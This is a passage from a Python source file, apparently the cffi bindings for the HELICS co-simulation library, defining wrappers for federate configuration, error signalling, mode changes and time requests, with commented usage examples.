err = helicsErrorInitialize()
result = f(fi.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederateInfo(result)
def helicsFederateInfoLoadFromArgs(fi: HelicsFederateInfo, arguments: List[str]):
"""
Load federate info from command line arguments.
**Parameters**
- **`fi`** - A federateInfo object.
- **`arguments`** - A list of strings from the command line.
"""
f = loadSym("helicsFederateInfoLoadFromArgs")
err = helicsErrorInitialize()
argc = len(arguments)
argv = ffi.new("char*[{argc}]".format(argc=argc))
for i, s in enumerate(arguments):
argv[i] = cstring(s)
f(fi.handle, argc, argv, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoLoadFromString(fi: HelicsFederateInfo, arguments: str):
"""
Load federate info from command line arguments contained in a string.
**Parameters**
- **`fi`** - A federateInfo object.
- **`arguments`** - Command line argument specified in a string
"""
f = loadSym("helicsFederateInfoLoadFromString")
err = helicsErrorInitialize()
f(fi.handle, cstring(arguments), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoFree(fi: HelicsFederateInfo):
"""
Delete the memory associated with `helics.HelicsFederateInfo`.
"""
f = loadSym("helicsFederateInfoFree")
f(fi.handle)
def helicsFederateIsValid(fed: HelicsFederate) -> bool:
"""
Check if a `helics.HelicsFederate` is valid.
**Returns**: `True` if the federate is a valid active federate, `False` otherwise.
"""
f = loadSym("helicsFederateIsValid")
result = f(fed.handle)
return result == 1
def helicsFederateInfoSetCoreName(fi: HelicsFederateInfo, core_name: str):
"""
Set the name of the core to link to for a federate.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_name`** - The identifier for a core to link to.
"""
f = loadSym("helicsFederateInfoSetCoreName")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreInitString(fi: HelicsFederateInfo, core_init_string: str):
"""
Set the initialization string for the core usually in the form of command line arguments.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_init_string`** - A string containing command line arguments to be passed to the core.
"""
f = loadSym("helicsFederateInfoSetCoreInitString")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerInitString(fi: HelicsFederateInfo, broker_init_string: str):
"""
Set the initialization string that a core will pass to a generated broker usually in the form of command line arguments.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_init_string`** - A string with command line arguments for a generated broker.
"""
f = loadSym("helicsFederateInfoSetBrokerInitString")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_init_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreType(fi: HelicsFederateInfo, core_type: HelicsCoreType):
"""
Set the core type by integer code.
Valid values available by definitions in `api-data.h`.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_type`** - A numerical code for a core type; see `helics.HelicsCoreType`.
"""
f = loadSym("helicsFederateInfoSetCoreType")
err = helicsErrorInitialize()
f(fi.handle, HelicsCoreType(core_type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetCoreTypeFromString(fi: HelicsFederateInfo, core_type: str):
"""
Set the core type from a string.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`core_type`** - A string naming a core type.
"""
f = loadSym("helicsFederateInfoSetCoreTypeFromString")
err = helicsErrorInitialize()
f(fi.handle, cstring(core_type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBroker(fi: HelicsFederateInfo, broker_string: str):
"""
Set the name or connection information for a broker.
This is only used if the core is automatically created; the broker information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_string`** - A string which defines the connection information for a broker either a name or an address.
"""
f = loadSym("helicsFederateInfoSetBroker")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerKey(fi: HelicsFederateInfo, broker_key: str):
"""
Set the key for a broker connection.
This is only used if the core is automatically created; the broker information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_key`** - A string containing a key for the broker to connect.
"""
f = loadSym("helicsFederateInfoSetBrokerKey")
err = helicsErrorInitialize()
f(fi.handle, cstring(broker_key), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetBrokerPort(fi: HelicsFederateInfo, broker_port: Union[int, str]):
"""
Set the port to use for the broker.
This is only used if the core is automatically created; the broker information will be transferred to the core for connection.
This will only be useful for network broker connections.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`broker_port`** - The integer port number to use for connection with a broker.
"""
f = loadSym("helicsFederateInfoSetBrokerPort")
err = helicsErrorInitialize()
broker_port = int(broker_port)
f(fi.handle, broker_port, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetLocalPort(fi: HelicsFederateInfo, local_port: Union[int, str]):
"""
Set the local port to use.
This is only used if the core is automatically created; the port information will be transferred to the core for connection.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`local_port`** - The port information to use as the local server port; can be a number, "auto", or "os_local".
"""
f = loadSym("helicsFederateInfoSetLocalPort")
err = helicsErrorInitialize()
local_port = str(local_port)
f(fi.handle, cstring(local_port), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsGetPropertyIndex(value: str) -> HelicsProperty:
"""
Get a property index for use in `helics.helicsFederateInfoSetFlagOption`, `helics.helicsFederateInfoSetTimeProperty`, or `helics.helicsFederateInfoSetIntegerProperty`.
**Parameters**
- **`value`** - A string with the property name.
**Returns**: An int with the property code or (-1) if not a valid property.
"""
f = loadSym("helicsGetPropertyIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown property index for flag `{value}`".format(value=value))
else:
return HelicsProperty(result)
def helicsGetFlagIndex(value: str) -> HelicsFederateFlag:
"""
Get a property index for use in `helics.helicsFederateInfoSetFlagOption`, `helics.helicsFederateSetFlagOption`.
**Parameters**
- **`value`** - A string with the option name.
**Returns**: An int with the property code or (-1) if not a valid property.
"""
f = loadSym("helicsGetFlagIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown property index for flag `{value}`".format(value=value))
else:
try:
return HelicsFlag(result)
except Exception as _:
return HelicsFederateFlag(result)
def helicsGetOptionIndex(value: str) -> HelicsHandleOption:
"""
Get an option index for use in `helics.helicsPublicationSetOption`, `helics.helicsInputSetOption`, `helics.helicsEndpointSetOption`,
`helics.helicsFilterSetOption`, and the corresponding get functions
**Parameters**
- **`value`** - A string with the option name
**Returns**: An int with the option index or (-1) if not a valid property.
"""
f = loadSym("helicsGetOptionIndex")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown option index for flag `{value}`".format(value=value))
else:
return HelicsHandleOption(result)
def helicsGetOptionValue(value: str) -> int:
"""
Get an option value for use in `helics.helicsPublicationSetOption`, `helics.helicsInputSetOption`, `helics.helicsEndpointSetOption`,
`helics.helicsFilterSetOption`.
**Parameters**
- **`value`** - A string representing the value.
**Returns**: An int with the option value; raises a `HelicsException` if the string is not a valid value.
"""
f = loadSym("helicsGetOptionValue")
result = f(cstring(value))
if result == -1 or result == -101:
raise HelicsException("[-1] Unknown option value for flag `{value}`".format(value=value))
else:
return result
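# Example (illustrative sketch): resolving property, flag, and option indices from
# their string names before passing them to the setter functions defined below.
# The exact name strings follow the HELICS documentation and are assumptions here.
#
#     period_property = helicsGetPropertyIndex("period")
#     uninterruptible_flag = helicsGetFlagIndex("uninterruptible")
#     connection_required_option = helicsGetOptionIndex("connection_required")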
def helicsFederateInfoSetFlagOption(fi: HelicsFederateInfo, flag: Union[int, HelicsFederateFlag, HelicsFlag], value: bool):
"""
Set a flag in the info structure.
Valid flags are available in `helics.HelicsFederateFlag`.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`flag`** - A numerical index for a flag.
- **`value`** - The desired value of the flag `True` or `False`.
"""
f = loadSym("helicsFederateInfoSetFlagOption")
err = helicsErrorInitialize()
f(fi.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetSeparator(fi: HelicsFederateInfo, separator: str):
"""
Set the separator character in the info structure.
The separator character is the separation character for local publications/endpoints in creating their global name.
For example if the separator character is '/' then a local endpoint would have a globally reachable name of fedName/localName.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`separator`** - The character to use as a separator.
"""
f = loadSym("helicsFederateInfoSetSeparator")
err = helicsErrorInitialize()
f(fi.handle, cchar(separator), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetTimeProperty(fi: HelicsFederateInfo, time_property: HelicsProperty, value: HelicsTime):
"""
Set a time-based property in a federate info object, such as the output delay for a federate.
**Parameters**
- **`fi`** - The federate info object to alter.
- **`time_property`** - An integer representation of the time-based property to set; see `helics.HelicsProperty`.
- **`value`** - The value to set the time property to.
"""
f = loadSym("helicsFederateInfoSetTimeProperty")
err = helicsErrorInitialize()
f(fi.handle, HelicsProperty(time_property), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateInfoSetIntegerProperty(fi: HelicsFederateInfo, property: HelicsProperty, value: int):
"""
Set a known integer property for a federate, such as the log level.
**Parameters**
- **`fi`** - The federateInfo object to alter.
- **`property`** - `helics.HelicsProperty`.
- **`value`** - The value to set the property to.
"""
f = loadSym("helicsFederateInfoSetIntegerProperty")
err = helicsErrorInitialize()
f(fi.handle, HelicsProperty(property), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
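# Example (illustrative sketch): configuring a FederateInfo object with the setters
# above. `helicsCreateFederateInfo` is assumed from earlier in this module, and the
# property/flag name strings are assumptions based on the HELICS documentation.
#
#     fi = helicsCreateFederateInfo()
#     helicsFederateInfoSetSeparator(fi, "/")
#     helicsFederateInfoSetTimeProperty(fi, helicsGetPropertyIndex("period"), 1.0)
#     helicsFederateInfoSetIntegerProperty(fi, helicsGetPropertyIndex("log_level"), 2)
#     helicsFederateInfoSetFlagOption(fi, helicsGetFlagIndex("uninterruptible"), True)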
def helicsFederateRegisterInterfaces(fed: HelicsFederate, file: str):
"""
Load interfaces from a file.
**Parameters**
- **`fed`** - The federate to which to load interfaces.
- **`file`** - The name of a file to load the interfaces from either JSON, or TOML.
"""
f = loadSym("helicsFederateRegisterInterfaces")
err = helicsErrorInitialize()
f(fed.handle, cstring(file), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
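# Example (illustrative sketch): loading publications, inputs, and endpoints from a
# config file. The file name is a placeholder; `fed` is an existing federate.
#
#     helicsFederateRegisterInterfaces(fed, "federate_interfaces.json")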
def helicsFederateGlobalError(fed: HelicsFederate, error_code: int, error_string: str):
"""
Generate a global error from a federate.
A global error halts the co-simulation completely.
**Parameters**
- **`fed`** - The federate to create an error in.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsFederateGlobalError")
if HELICS_VERSION == 2:
f(fed.handle, error_code, cstring(error_string))
else:
err = helicsErrorInitialize()
f(fed.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerGlobalError(broker: HelicsBroker, error_code: int, error_string: str):
"""
Generate a global error through a broker. A global error halts the co-simulation completely.
**Parameters**
- **`broker`** - The broker to generate the error on.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsBrokerGlobalError")
err = helicsErrorInitialize()
f(broker.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsCoreGlobalError(core: HelicsCore, error_code: int, error_string: str):
"""
Generate a global error through a core. A global error halts the co-simulation completely.
**Parameters**
- **`core`** - The core to generate the error on.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsCoreGlobalError")
err = helicsErrorInitialize()
f(core.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateLocalError(fed: HelicsFederate, error_code: int, error_string: str):
"""
Generate a local error in a federate.
This will propagate through the co-simulation but not necessarily halt it; the effect is similar to finalize but allows some interaction with a core for a brief time.
**Parameters**
- **`fed`** - The federate to create an error in.
- **`error_code`** - The integer code for the error.
- **`error_string`** - A string describing the error.
"""
f = loadSym("helicsFederateLocalError")
if HELICS_VERSION == 2:
f(fed.handle, error_code, cstring(error_string))
else:
err = helicsErrorInitialize()
f(fed.handle, error_code, cstring(error_string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
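# Example (illustrative sketch): signalling problems from a federate. A global error
# halts the whole co-simulation, while a local error mainly affects the calling
# federate. The error codes and strings are placeholders.
#
#     helicsFederateLocalError(fed, 3, "input data out of range")
#     helicsFederateGlobalError(fed, 4, "unrecoverable configuration error")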
def helicsFederateFinalize(fed: HelicsFederate):
"""
Finalize the federate. This function halts all communication in the federate and disconnects it from the core.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnect` instead.")
helicsFederateDisconnect(fed)
def helicsFederateFinalizeAsync(fed: HelicsFederate):
"""
Finalize the federate in an async call.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnectAsync` instead.")
helicsFederateDisconnectAsync(fed)
def helicsFederateFinalizeComplete(fed: HelicsFederate):
"""
Complete the asynchronous disconnect call.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateDisconnectComplete` instead.")
helicsFederateDisconnectComplete(fed)
def helicsFederateDisconnect(fed: HelicsFederate):
"""
Disconnect the federate. This function halts all communication in the federate and disconnects it from the core.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalize")
else:
f = loadSym("helicsFederateDisconnect")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDisconnectAsync(fed: HelicsFederate):
"""
Disconnect the federate in an async call.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalizeAsync")
else:
f = loadSym("helicsFederateDisconnectAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateDisconnectComplete(fed: HelicsFederate):
"""
Complete the asynchronous disconnect call.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateFinalizeComplete")
else:
f = loadSym("helicsFederateDisconnectComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateFree(fed: HelicsFederate):
"""
Release the memory associated with a federate.
"""
f = loadSym("helicsFederateFree")
f(fed.handle)
def helicsCloseLibrary():
"""
Call when done using the helics library.
This function will ensure the threads are closed properly. If possible this should be the last call before exiting.
"""
f = loadSym("helicsCloseLibrary")
f()
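# Example (illustrative sketch): a typical teardown sequence once a federate is done.
#
#     helicsFederateDisconnect(fed)
#     helicsFederateFree(fed)
#     helicsCloseLibrary()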
def helicsFederateEnterInitializingMode(fed: HelicsFederate):
"""
Enter the initialization state of a federate.
The initialization state allows initial values to be set and received if the iteration is requested on entry to the execution state. This is a blocking call and will block until the core allows it to proceed.
**Parameters**
- **`fed`** - The federate to operate on.
"""
f = loadSym("helicsFederateEnterInitializingMode")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterInitializingModeAsync(fed: HelicsFederate):
"""
Non-blocking alternative to `helics.helicsFederateEnterInitializingMode`.
The function `helics.helicsFederateEnterInitializingModeComplete` must be called to finish the operation.
**Parameters**
- **`fed`** - The federate to operate on.
"""
f = loadSym("helicsFederateEnterInitializingModeAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateIsAsyncOperationCompleted(fed: HelicsFederate) -> bool:
"""
Check if the current Asynchronous operation has completed.
**Parameters**
- **`fed`** - The federate to operate on.
**Returns**: `True` if current operation has completed, else `False`.
"""
f = loadSym("helicsFederateIsAsyncOperationCompleted")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result == 1
def helicsFederateEnterInitializingModeComplete(fed: HelicsFederate):
"""
Finalize the entry to initialize mode that was initiated with `helics.helicsFederateEnterInitializingModeAsync`.
**Parameters**
- **`fed`** - The federate desiring to complete the initialization step.
"""
f = loadSym("helicsFederateEnterInitializingModeComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
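# Example (illustrative sketch): entering initializing mode without blocking, doing
# other setup work while waiting, then completing the call.
# `do_other_setup_work` is a hypothetical placeholder.
#
#     helicsFederateEnterInitializingModeAsync(fed)
#     while not helicsFederateIsAsyncOperationCompleted(fed):
#         do_other_setup_work()
#     helicsFederateEnterInitializingModeComplete(fed)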
def helicsFederateEnterExecutingMode(fed: HelicsFederate):
"""
Request that the federate enter the Execution mode.
This call is blocking until granted entry by the `helics.HelicsCore`. On return from this call the federate will be at time 0. For an asynchronous alternative call see `helics.helicsFederateEnterExecutingModeAsync`
**Parameters**
- **`fed`** - A federate to change modes.
"""
f = loadSym("helicsFederateEnterExecutingMode")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeAsync(fed: HelicsFederate):
"""
Request that the federate enter the Execution mode.
This call is non-blocking and will return immediately. Call `helics.helicsFederateEnterExecutingModeComplete` to finish the call sequence
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to complete the call.
"""
f = loadSym("helicsFederateEnterExecutingModeAsync")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeComplete(fed: HelicsFederate):
"""
Complete the call to `helics.helicsFederateEnterExecutingModeAsync`.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to complete the call.
"""
f = loadSym("helicsFederateEnterExecutingModeComplete")
err = helicsErrorInitialize()
f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeIterative(fed: HelicsFederate, iterate: HelicsIterationRequest) -> HelicsIterationResult:
"""
Request an iterative entry to the execution mode.
This call allows for finer grain control of the iterative process than `helics.helicsFederateEnterExecutingMode`. It takes an iteration request and returns an iteration status.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
**Returns**: `helics.HelicsIterationResult`.
"""
f = loadSym("helicsFederateEnterExecutingModeIterative")
err = helicsErrorInitialize()
result = f(fed.handle, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsIterationResult(result)
def helicsFederateEnterExecutingModeIterativeAsync(fed: HelicsFederate, iterate: HelicsIterationRequest):
"""
Request an iterative entry to the execution mode.
This call allows for finer grain control of the iterative process than `helics.helicsFederateEnterExecutingMode`. Call `helics.helicsFederateEnterExecutingModeIterativeComplete` to finish the operation.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
"""
f = loadSym("helicsFederateEnterExecutingModeIterativeAsync")
err = helicsErrorInitialize()
f(fed.handle, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateEnterExecutingModeIterativeComplete(
fed: HelicsFederate,
) -> HelicsIterationResult:
"""
Complete the asynchronous iterative call into ExecutionMode.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: `helics.HelicsIterationResult`.
"""
f = loadSym("helicsFederateEnterExecutingModeIterativeComplete")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsIterationResult(result)
def helicsFederateGetState(fed: HelicsFederate) -> HelicsFederateState:
"""
Get the current state of a federate.
**Parameters**
- **`fed`** - The federate to query.
**Returns**: `helics.HelicsFederateState`.
"""
f = loadSym("helicsFederateGetState")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsFederateState(result)
def helicsFederateGetCoreObject(fed: HelicsFederate) -> HelicsCore:
"""
Get the `helics.HelicsCore` associated with a federate.
**Parameters**
- **`fed`** - `helics.HelicsFederate`.
**Returns**: `helics.HelicsCore`.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use `helicsFederateGetCore` instead.")
return helicsFederateGetCore(fed)
def helicsFederateGetCore(fed: HelicsFederate) -> HelicsCore:
"""
Get the `helics.HelicsCore` associated with a federate.
**Parameters**
- **`fed`** - `helics.HelicsFederate`.
**Returns**: `helics.HelicsCore`.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsFederateGetCoreObject")
else:
f = loadSym("helicsFederateGetCore")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsCore(result)
def helicsFederateRequestTime(fed: HelicsFederate, request_time: HelicsTime) -> HelicsTime:
"""
Request the next time for federate execution.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next requested time.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestTime")
err = helicsErrorInitialize()
result = f(fed.handle, request_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
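# Example (illustrative sketch): a basic time-stepping loop once the federate has
# entered executing mode. The step size and stop time are placeholders.
#
#     helicsFederateEnterExecutingMode(fed)
#     granted_time = 0.0
#     while granted_time < 10.0:
#         granted_time = helicsFederateRequestTime(fed, granted_time + 1.0)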
def helicsFederateRequestTimeAdvance(fed: HelicsFederate, time_delta: HelicsTime) -> HelicsTime:
"""
Request the next time for federate execution.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`time_delta`** - The requested amount of time to advance.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestTimeAdvance")
err = helicsErrorInitialize()
result = f(fed.handle, time_delta, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestNextStep(fed: HelicsFederate) -> HelicsTime:
"""
Request the next time step for federate execution.
Federates should have set up the period or `minDelta` for this to work well, but it will request the next time step, which is the current time plus the minimum time step.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: `helics.HelicsTime`.
"""
f = loadSym("helicsFederateRequestNextStep")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
def helicsFederateRequestTimeIterative(
fed: HelicsFederate, request_time: HelicsTime, iterate: HelicsIterationRequest
) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Request an iterative time.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next desired time.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
**Returns**: `(helics.HelicsTime, helics.HelicsIterationResult)`.
"""
f = loadSym("helicsFederateRequestTimeIterative")
err = helicsErrorInitialize()
if HELICS_VERSION == 2:
out_iterate = ffi.new("helics_iteration_result *")
else:
out_iterate = ffi.new("HelicsIterationResult *")
result = f(fed.handle, request_time, HelicsIterationRequest(iterate), out_iterate, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result, HelicsIterationResult(out_iterate[0])
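# Example (illustrative sketch): requesting time iteratively. The enum member name
# `HelicsIterationRequest.ITERATE_IF_NEEDED` is an assumption; see the enum
# definition earlier in this module for the exact spelling.
#
#     granted_time, status = helicsFederateRequestTimeIterative(
#         fed, 1.0, HelicsIterationRequest.ITERATE_IF_NEEDED
#     )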
def helicsFederateRequestTimeAsync(fed: HelicsFederate, request_time: HelicsTime):
"""
Request the next time for federate execution in an asynchronous call.
Call `helics.helicsFederateRequestTimeComplete` to finish the call.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next requested time.
"""
f = loadSym("helicsFederateRequestTimeAsync")
err = helicsErrorInitialize()
f(fed.handle, request_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRequestTimeComplete(fed: HelicsFederate) -> HelicsTime:
"""
Complete an asynchronous requestTime call.
**Parameters**
- **`fed`** - The federate to make the request of.
"""
f = loadSym("helicsFederateRequestTimeComplete")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result
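# Example (illustrative sketch): overlapping local computation with a pending time
# request. `run_local_model_step` is a hypothetical placeholder.
#
#     helicsFederateRequestTimeAsync(fed, 2.0)
#     run_local_model_step()
#     granted_time = helicsFederateRequestTimeComplete(fed)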
def helicsFederateRequestTimeIterativeAsync(fed: HelicsFederate, request_time: HelicsTime, iterate: HelicsIterationRequest):
"""
Request an iterative time through an asynchronous call.
This call allows for finer grain control of the iterative process than `helics.helicsFederateRequestTime`. It takes a time and iteration request, and returns a time and iteration status. Call `helics.helicsFederateRequestTimeIterativeComplete` to finish the process.
**Parameters**
- **`fed`** - The federate to make the request of.
- **`request_time`** - The next desired time.
- **`iterate`** - `helics.HelicsIterationRequest`, i.e. the requested iteration mode.
"""
f = loadSym("helicsFederateRequestTimeIterativeAsync")
err = helicsErrorInitialize()
f(fed.handle, request_time, HelicsIterationRequest(iterate), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRequestTimeIterativeComplete(fed: HelicsFederate) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Complete an iterative time request asynchronous call.
**Parameters**
- **`fed`** - The federate to make the request of.
**Returns**: `(helics.HelicsTime, helics.HelicsIterationResult)`.
"""
f = loadSym("helicsFederateRequestTimeIterativeComplete")
err = helicsErrorInitialize()
if HELICS_VERSION == 2:
out_iterate = ffi.new("helics_iteration_result *")
else:
out_iterate = ffi.new("HelicsIterationResult *")
result = f(fed.handle, out_iterate, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return result, HelicsIterationResult(out_iterate[0])
def helicsFederateGetName(fed: HelicsFederate) -> str:
"""
Get the name of the federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to query.
**Returns**: A string with the name.
"""
f = loadSym("helicsFederateGetName")
result = f(fed.handle)
return ffi.string(result).decode()
def helicsFederateSetTimeProperty(fed: HelicsFederate, time_property: int, time: HelicsTime):
"""
Set a time based property for a federate.
**Parameters**
- **`fed`** - The `helics.HelicsFederate` to set the property for.
- **`time_property`** - An integer code for a time property.
- **`time`** - The requested value of the property.
"""
f = loadSym("helicsFederateSetTimeProperty")
err = helicsErrorInitialize()
f(fed.handle, time_property, time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetFlagOption(fed: HelicsFederate, flag: Union[int, HelicsFederateFlag, HelicsFlag], value: bool):
"""
Set a flag for the federate.
**Parameters**
- **`fed`** - The federate to alter a flag for.
- **`flag`** - The flag to change.
- **`value`** - The new value of the flag: `True` or `False`.
"""
f = loadSym("helicsFederateSetFlagOption")
err = helicsErrorInitialize()
f(fed.handle, flag, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSetSeparator(fed: HelicsFederate, separator: str):
"""
Set the separator character in a federate.
The separator character is the separation character for local publications/endpoints in creating their global name.
For example if the separator character is '/' then a local endpoint would have a globally reachable name of fedName/localName.
**Parameters**
- **`fed`** - The federate info object to alter.
- **`separator`** - The character to use as a separator.
"""
f = loadSym("helicsFederateSetSeparator")
